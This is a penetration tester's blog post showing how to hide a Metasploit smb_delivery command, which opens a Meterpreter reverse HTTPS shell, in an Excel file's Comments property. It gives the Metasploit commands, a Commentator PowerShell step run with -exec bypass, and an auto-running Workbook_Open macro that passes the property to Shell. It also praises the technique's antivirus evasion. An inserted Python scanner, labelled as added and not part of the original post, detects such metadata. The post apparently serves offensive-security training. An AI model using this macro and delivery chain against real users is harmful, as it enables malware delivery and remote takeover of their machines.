by James Smith

Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)


As a penetration tester I’m always excited to see new and creative methods of creating weaponized MS Office documents.  This blog post builds on the following findings published by Black Hills InfoSec:

There are numerous ways in which MS Office documents can be abused and weaponised to deliver a variety of cyber-related attacks.  This blog post will demonstrate how quick and easy it is to hide a Metasploit and Empire payload within an MS Office document and execute it from an embedded Macro.


In the first example I’m going to use a payload generated with Metasploit’s ‘SMB Delivery’ functionality to weaponise an MS Excel document.  The ‘SMB Delivery’ module is a personal favourite of mine given its simplicity and subtle anti-virus evasion.

Begin by loading the relevant module into Metasploit:

use exploit/windows/smb/smb_delivery





Set the payload to anything you desire; in this example I’ll be using the Windows Meterpreter Reverse HTTPS payload:

set PAYLOAD windows/meterpreter/reverse_https




Finally, issue the ‘exploit’ command to begin staging the attack:


Now, in order to utilise this, we will need to execute the following command on the victim host:

rundll32.exe \\\PPuUdw\test.dll,0



Note: the folder path is randomly generated as we didn’t explicitly define it within the Metasploit options

In order to achieve this, we’re going to embed this command into an MS Excel document within the ‘comments’ property and execute it from an embedded Macro.  This can easily be done by using the PowerShell script ‘Commentator’.


Begin by starting PowerShell:

powershell.exe -exec bypass



Import the module into your PowerShell environment:

Import-Module .\Commentator.ps1



And execute the script to embed our payload into the ‘comments’ property of the MS Excel document:

Invoke-Commentator -OfficeFile .\msf_smb_delivery.xlsx -Comment "rundll32.exe \\\PPuUdw\test.dll,0"




After successful execution, a copy of your existing MS Office file will be created with the payload embedded:

The new file with added comment has been written to .\msf_smb_delivery-wlc.xlsx.


This can be verified by inspecting the file’s metadata / properties:
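From the defender's side, the same property can be checked in bulk before a file reaches a user. The sketch below is an added example, not part of the original post or of Commentator: it reads the ‘Comments’ property (stored as dc:description in docProps/core.xml) from an OOXML file and flags command-like content. The indicator list, the function names and the sample values are assumptions, and it covers OOXML files (.xlsx, .xlsm, .docx) only, not the legacy binary .xls format.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML stores the built-in "Comments" property as dc:description in docProps/core.xml.
DC_DESCRIPTION = "{http://purl.org/dc/elements/1.1/}description"

# Heuristic indicators (an assumed starting list; tune for your environment).
SUSPICIOUS = {
    "lolbin": re.compile(r"\b(rundll32|regsvr32|mshta|powershell|cmd|wscript|cscript)(\.exe)?\b", re.I),
    "unc_path": re.compile(r"\\\\[^\\\s]+\\[^\s]+"),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}

def read_comments(ooxml_file):
    """Return the Comments property of an OOXML file (path or file object), or ''."""
    with zipfile.ZipFile(ooxml_file) as z:
        if "docProps/core.xml" not in z.namelist():
            return ""
        root = ET.fromstring(z.read("docProps/core.xml"))
    node = root.find(DC_DESCRIPTION)
    return (node.text or "") if node is not None else ""

def scan(ooxml_file):
    """Return (comment, sorted names of the indicators that matched)."""
    comment = read_comments(ooxml_file)
    hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(comment))
    return comment, hits

def make_sample(comment):
    """Build a minimal constructed OOXML-like zip in memory for the demo."""
    core = (
        '<cp:coreProperties '
        'xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
        'xmlns:dc="http://purl.org/dc/elements/1.1/">'
        f"<dc:description>{comment}</dc:description></cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
    buf.seek(0)
    return buf

if __name__ == "__main__":
    # Constructed sample values; 192.0.2.10 is a documentation address.
    for text in (r"rundll32.exe \\192.0.2.10\share\test.dll,0", "Q3 budget draft"):
        print(scan(make_sample(text)))
```

A hit is a triage signal rather than a verdict: a command-like string in a metadata field is rarely legitimate, but the patterns should be tuned against your own document corpus.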


Lastly, in order to execute the payload embedded within the ‘comments’ property, the following embedded Macro can be used:


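Sub Workbook_Open()
    ' Runs automatically when the workbook is opened and macros are enabled
    Dim p As DocumentProperty

    ' Walk the built-in document properties looking for 'Comments'
    For Each p In ActiveWorkbook.BuiltinDocumentProperties
        If p.Name = "Comments" Then
            ' Pass the property value to Shell for execution
            Shell (p.Value)
        End If
    Next p
End Sub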




Note: In order to utilise auto-execution via the ‘Workbook_Open()’ function, the weaponised MS Excel document needed to be downgraded to Office 98 – 2003 compatibility (.xls)

After the victim has clicked ‘enable editing’ and ‘enable content’, a Meterpreter session should appear:

